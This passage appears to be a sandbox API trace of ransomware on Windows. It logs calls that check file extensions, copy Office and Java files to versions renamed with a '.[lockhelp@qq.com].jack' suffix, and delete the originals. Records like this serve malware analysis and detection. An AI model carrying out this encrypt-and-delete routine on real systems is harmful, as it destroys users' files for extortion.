lpOverlapped=0x0) returned 1 [0201.373] SetEndOfFile (hFile=0x3d4) returned 1 [0201.373] CloseHandle (hObject=0x3d4) returned 1 [0201.586] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.586] SetEndOfFile (hFile=0x3f8) returned 1 [0201.587] CloseHandle (hObject=0x3f8) returned 1 [0201.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.587] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif")) returned 1 [0201.587] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.587] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.587] lstrlenW (lpString=".doc") returned 4 [0201.587] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.588] lstrlenW (lpString=".docx") returned 5 [0201.588] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.588] lstrlenW (lpString=".pdf") returned 4 [0201.588] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.588] lstrlenW (lpString=".xls") returned 4 [0201.588] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.588] lstrlenW (lpString=".xlsx") returned 5 [0201.588] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.588] lstrlenW (lpString=".ppt") returned 4 [0201.588] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.588] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.588] lstrlenW (lpString=".zip") returned 4 [0201.588] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.588] lstrlenW (lpString=".rar") returned 4 [0201.588] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.588] lstrlenW (lpString=".bz2") returned 4 [0201.588] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.588] lstrlenW (lpString=".7z") returned 3 [0201.588] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.588] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.588] lstrlenW (lpString=".dbf") returned 4 [0201.588] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.588] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.588] lstrlenW (lpString=".1cd") returned 4 [0201.588] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.704] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.704] lstrlenW (lpString=".jpg") returned 4 [0201.704] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.704] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.704] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.704] lstrlenW (lpString=".doc") returned 4 [0201.704] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.704] lstrlenW (lpString=".docx") returned 5 [0201.704] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.704] lstrlenW (lpString=".pdf") returned 4 [0201.704] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.704] lstrlenW (lpString=".xls") returned 4 [0201.704] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.705] lstrlenW (lpString=".xlsx") returned 5 [0201.705] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.705] lstrlenW (lpString=".ppt") returned 4 [0201.705] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.705] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.705] lstrlenW (lpString=".zip") returned 4 [0201.705] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.705] lstrlenW (lpString=".rar") returned 4 [0201.705] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.705] lstrlenW (lpString=".bz2") returned 4 [0201.705] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.705] lstrlenW (lpString=".7z") returned 3 [0201.705] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.705] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.705] lstrlenW (lpString=".dbf") returned 4 [0201.705] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.705] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.705] lstrlenW (lpString=".1cd") returned 4 [0201.705] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.705] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0201.705] lstrlenW (lpString=".jpg") returned 4 [0201.705] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.705] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0201.705] lstrlenW (lpString="FileSystemMetadata.xml") returned 22 [0201.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.706] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=281) returned 1 [0201.706] CloseHandle (hObject=0x404) returned 1 [0201.706] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml")) returned 0x220 [0201.706] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.706] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.706] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0201.706] GetLastError () returned 0x0 [0201.706] ReadFile (in: hFile=0x404, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x119, lpOverlapped=0x0) returned 1 [0201.707] WriteFile (in: hFile=0x3f8, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x120, lpOverlapped=0x0) returned 1 [0201.708] ReadFile (in: hFile=0x404, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.708] WriteFile (in: hFile=0x3f8, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x100, lpOverlapped=0x0) returned 1 [0201.709] SetEndOfFile (hFile=0x3f8) returned 1 [0201.709] CloseHandle (hObject=0x3f8) returned 1 [0201.710] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.710] SetEndOfFile (hFile=0x404) returned 1 [0201.711] CloseHandle (hObject=0x404) returned 1 [0201.711] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0201.711] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml")) returned 1 [0201.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.711] lstrlenW (lpString=".doc") returned 4 [0201.712] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0201.712] lstrlenW (lpString=".docx") returned 5 [0201.712] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0201.712] lstrlenW (lpString=".pdf") returned 4 [0201.712] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0201.712] lstrlenW (lpString=".xls") returned 4 [0201.712] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0201.712] lstrlenW (lpString=".xlsx") returned 5 [0201.712] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0201.712] lstrlenW (lpString=".ppt") returned 4 [0201.712] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0201.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.712] lstrlenW (lpString=".zip") returned 4 [0201.712] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0201.712] lstrlenW (lpString=".rar") returned 4 [0201.712] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0201.712] lstrlenW (lpString=".bz2") returned 4 [0201.712] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0201.712] lstrlenW (lpString=".7z") returned 3 [0201.712] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0201.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.712] lstrlenW (lpString=".dbf") returned 4 [0201.712] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0201.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.712] lstrlenW (lpString=".1cd") returned 4 [0201.712] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0201.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.712] lstrlenW (lpString=".jpg") returned 4 [0201.712] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0201.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.713] lstrlenW (lpString=".doc") returned 4 [0201.713] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0201.713] lstrlenW (lpString=".docx") returned 5 [0201.713] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0201.713] lstrlenW (lpString=".pdf") returned 4 [0201.713] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0201.713] lstrlenW (lpString=".xls") returned 4 [0201.713] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0201.713] lstrlenW (lpString=".xlsx") returned 5 [0201.713] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0201.713] lstrlenW (lpString=".ppt") returned 4 [0201.713] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0201.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.713] lstrlenW (lpString=".zip") returned 4 [0201.713] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0201.713] lstrlenW (lpString=".rar") returned 4 [0201.713] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0201.713] lstrlenW (lpString=".bz2") returned 4 [0201.713] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0201.713] lstrlenW (lpString=".7z") returned 3 [0201.713] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0201.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.713] lstrlenW (lpString=".dbf") returned 4 [0201.713] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0201.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.714] lstrlenW (lpString=".1cd") returned 4 [0201.714] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0201.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0201.714] lstrlenW (lpString=".jpg") returned 4 [0201.714] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0201.714] lstrcmpiW (lpString1=".HTM", lpString2=".jack") returned -1 [0201.714] lstrlenW (lpString="OSPP.HTM") returned 8 [0201.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.715] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=174528) returned 1 [0201.715] CloseHandle (hObject=0x404) returned 1 [0201.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm")) returned 0x20 [0201.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.715] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.715] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0201.718] GetLastError () returned 0x0 [0201.718] ReadFile (in: hFile=0x404, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x2a9c0, lpOverlapped=0x0) returned 1 [0201.769] WriteFile (in: hFile=0x3f8, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x2a9d0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x2a9d0, lpOverlapped=0x0) returned 1 [0201.772] ReadFile (in: hFile=0x404, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.772] WriteFile (in: hFile=0x3f8, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xe4, lpOverlapped=0x0) returned 1 [0201.772] SetEndOfFile (hFile=0x3f8) returned 1 [0201.773] CloseHandle (hObject=0x3f8) returned 1 [0201.777] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.777] SetEndOfFile (hFile=0x404) returned 1 [0201.779] CloseHandle (hObject=0x404) returned 1 [0201.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.779] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm")) returned 1 [0201.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.779] lstrlenW (lpString=".doc") returned 4 [0201.779] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0201.779] lstrlenW (lpString=".docx") returned 5 [0201.779] lstrcmpiW (lpString1=".docx", lpString2="P.HTM") returned -1 [0201.779] lstrlenW (lpString=".pdf") returned 4 [0201.779] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0201.779] lstrlenW (lpString=".xls") returned 4 [0201.779] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0201.779] lstrlenW (lpString=".xlsx") returned 5 [0201.779] lstrcmpiW (lpString1=".xlsx", lpString2="P.HTM") returned -1 [0201.779] lstrlenW (lpString=".ppt") returned 4 [0201.779] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0201.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.780] lstrlenW (lpString=".zip") returned 4 [0201.780] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0201.780] lstrlenW (lpString=".rar") returned 4 [0201.780] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0201.780] lstrlenW (lpString=".bz2") returned 4 [0201.780] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0201.780] lstrlenW (lpString=".7z") returned 3 [0201.780] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0201.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.780] lstrlenW (lpString=".dbf") returned 4 [0201.780] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0201.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.780] lstrlenW (lpString=".1cd") returned 4 [0201.780] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0201.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.780] lstrlenW (lpString=".jpg") returned 4 [0201.780] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0201.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.780] lstrlenW (lpString=".doc") returned 4 [0201.781] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0201.781] lstrlenW (lpString=".docx") returned 5 [0201.781] lstrcmpiW (lpString1=".docx", lpString2="P.HTM") returned -1 [0201.781] lstrlenW (lpString=".pdf") returned 4 [0201.781] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0201.781] lstrlenW (lpString=".xls") returned 4 [0201.781] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0201.781] lstrlenW (lpString=".xlsx") returned 5 [0201.781] lstrcmpiW (lpString1=".xlsx", lpString2="P.HTM") returned -1 [0201.781] lstrlenW (lpString=".ppt") returned 4 [0201.781] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0201.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.781] lstrlenW (lpString=".zip") returned 4 [0201.781] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0201.781] lstrlenW (lpString=".rar") returned 4 [0201.781] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0201.781] lstrlenW (lpString=".bz2") returned 4 [0201.781] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0201.781] lstrlenW (lpString=".7z") returned 3 [0201.781] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0201.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.781] lstrlenW (lpString=".dbf") returned 4 [0201.781] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0201.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.781] lstrlenW (lpString=".1cd") returned 4 [0201.781] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0201.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0201.781] lstrlenW (lpString=".jpg") returned 4 [0201.781] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0201.781] lstrcmpiW (lpString1=".XML", lpString2=".jack") returned 1 [0201.781] lstrlenW (lpString="SLERROR.XML") returned 11 [0201.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.782] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=36336) returned 1 [0201.782] CloseHandle (hObject=0x404) returned 1 [0201.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml")) returned 0x20 [0201.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.782] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.782] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0201.782] GetLastError () returned 0x0 [0201.782] ReadFile (in: hFile=0x404, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x8df0, lpOverlapped=0x0) returned 1 [0203.068] WriteFile (in: hFile=0x3f8, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x8e00, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x8e00, lpOverlapped=0x0) returned 1 [0203.069] ReadFile (in: hFile=0x404, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0203.069] WriteFile (in: hFile=0x3f8, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xea, lpOverlapped=0x0) returned 1 [0203.069] SetEndOfFile (hFile=0x3f8) returned 1 [0203.070] CloseHandle (hObject=0x3f8) returned 1 [0203.071] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0203.071] SetEndOfFile (hFile=0x404) returned 1 [0203.072] CloseHandle (hObject=0x404) returned 1 [0203.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0203.073] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml")) returned 1 [0203.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.073] lstrlenW (lpString=".doc") returned 4 [0203.073] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0203.073] lstrlenW (lpString=".docx") returned 5 [0203.073] lstrcmpiW (lpString1=".docx", lpString2="R.XML") returned -1 [0203.073] lstrlenW (lpString=".pdf") returned 4 [0203.073] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0203.073] lstrlenW (lpString=".xls") returned 4 [0203.073] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0203.073] lstrlenW (lpString=".xlsx") returned 5 [0203.073] lstrcmpiW (lpString1=".xlsx", lpString2="R.XML") returned -1 [0203.073] lstrlenW (lpString=".ppt") returned 4 [0203.073] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0203.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.074] lstrlenW (lpString=".zip") returned 4 [0203.074] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0203.074] lstrlenW (lpString=".rar") returned 4 